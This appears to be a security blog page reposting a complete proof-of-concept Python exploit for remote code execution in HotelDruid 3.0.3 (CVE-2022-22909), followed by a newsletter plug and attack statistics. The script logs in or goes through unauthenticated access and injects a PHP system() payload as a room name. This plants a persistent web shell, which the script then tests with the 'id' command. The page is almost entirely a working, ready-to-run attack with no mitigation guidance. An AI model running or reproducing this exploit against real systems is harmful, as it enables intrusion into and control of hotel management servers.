What Is Hotel Druid
Hoteldruid is an open-source program for hotel management (property management software) developed by DigitalDruid.Net
Vendor URL: hoteldruid.com
CVE RATING: 8.8/10
HotelDruid RCE PoC
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
#!/usr/bin/python3
import requests
import argparse
def login( target , username = "" , password = "", noauth=False):
login_data = {
"vers_hinc" : "1",
"nome_utente_phpr" : username,
"password_phpr" : password
}
if not noauth:
login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('"> <b>')[0]
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
ret_data = {"token" : token , "anno" : anno}
#print("ret data" + ret_data)
return ret_data
else:
return False
else:
login_req = requests.get(f"{target}/inizio.php" , verify=False )
try:
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
token = ""
ret_data = {"token" : token , "anno" : anno}
return ret_data
except:
return False
def check_privilege(target , anno , token=""):
priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
#print(priv_req.text)
if "Modify" in priv_req.text:
return True
else:
return False
def add_room(target , anno , token=""):
add_room_data = {
"anno": anno,
"id_sessione": token,
"n_app":"{${system($_REQUEST['cmd'])}}",
"crea_app":"SI",
"crea_letti":"",
"n_letti":"",
"tipo_tabella":"appartamenti"
}
add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
#print(add_req.text)
if "has been added" in add_req.text:
return True
else:
return False
def test_code_execution(target):
code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
if "uid=" in code_execution_req.text:
return code_execution_req.text.split("\n")[0]
else:
return False
def main():
banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
parser = argparse.ArgumentParser()
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
req_args.add_argument("-u" , "--username" , help="Username" , required=False)
req_args.add_argument("-p" , "--password" , help="password", required=False)
req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
args = parser.parse_args()
target = args.target
if target[-1] == "/":
target = target[:-1]
noauth = args.noauth
username = args.username
password = args.password
if noauth == False and (username == None or password == None):
print('[-] Please provide the authentication method.' )
quit()
print(banner)
if not noauth:
print(f"[*] Logging in with the credential {username}:{password}")
login_result = login(username = username , password = password , target = target)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print("[-] Login failed, Check your credential or check if login is required or not .")
quit()
else:
print('[*] Trying to access the Dashboard.')
login_result = login(username = username , password = password , target = target , noauth=True)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
exit()
print("[*] Checking the privilege of the user.")
if check_privilege(target= target , token=token , anno=anno):
print("[+] User has the privilege to add room.")
else:
print("[-] User doesn't have the privilege to add room.")
exit()
print("[*] Adding a new room.")
if add_room(target = target , anno=anno , token=token):
print('[+] Room has been added successfully.')
else:
print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
exit()
print('[*] Testing code exection')
output = test_code_execution(target = target)
if output != False:
print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
print(f"[+] Example Output : {output}")
exit()
else:
print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
exit()
main()You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines
Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today
Remember, CyberSecurity Starts With You!
- Globally, 30,000 websites are hacked daily.
- 64% of companies worldwide have experienced at least one form of a cyber attack.
- There were 20M breached records in March 2021.
- In 2020, ransomware cases grew by 150%.
- Email is responsible for around 94% of all malware.
- Every 39 seconds, there is a new attack somewhere on the web.
- An average of around 24,000 malicious mobile apps are blocked daily on the internet.
- Sponsored -
